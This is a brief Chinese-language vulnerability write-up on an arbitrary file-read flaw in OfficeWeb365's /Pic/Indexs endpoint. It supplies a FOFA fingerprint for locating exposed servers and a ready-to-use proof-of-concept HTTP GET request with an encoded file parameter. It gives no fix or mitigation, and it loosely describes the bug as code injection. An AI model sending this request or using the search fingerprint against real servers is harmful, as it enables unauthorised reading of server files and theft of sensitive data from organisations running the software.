本文共 753 字，大约阅读时间需要 2 分钟。

OfficeWeb365漏洞分析报告

产品简介

OfficeWeb365 是一款专注于文档在线预览的云服务平台，支持 Microsoft Word、Excel、Powerpoint 文档的在线预览，以及 WPS 功能和 Adobe PDF 的文档在线预览。该平台旨在为用户提供便捷的文档管理与预览体验。

漏洞概述

近期研究发现，OfficeWeb365 的 /Pic/Indexs 接口存在严重的文件读取漏洞。攻击者可通过特定的加密方式注入恶意代码，读取任意文件并获取服务器敏感信息，这使得系统面临严重的安全隐患。

漏洞复现环境

在实际环境中，漏洞的复现需要满足以下条件：

• 服务器环境：OfficeWeb365 系统运行于支持最新浏览器版本的服务器环境。
• 客户端环境：使用支持 JavaScript 的现代浏览器（如 Chrome、Firefox 等）。
• FOFA 描述：body="请输入furl参数" || header="OfficeWeb365" || banner="OfficeWeb365"。

漏洞复现

以下是漏洞的 Proof of Concept (PoC) 代码示例：

GET /Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36

此代码示例展示了攻击者如何通过特定的 GET 请求参数注入恶意代码，利用漏洞读取任意文件并获取敏感信息。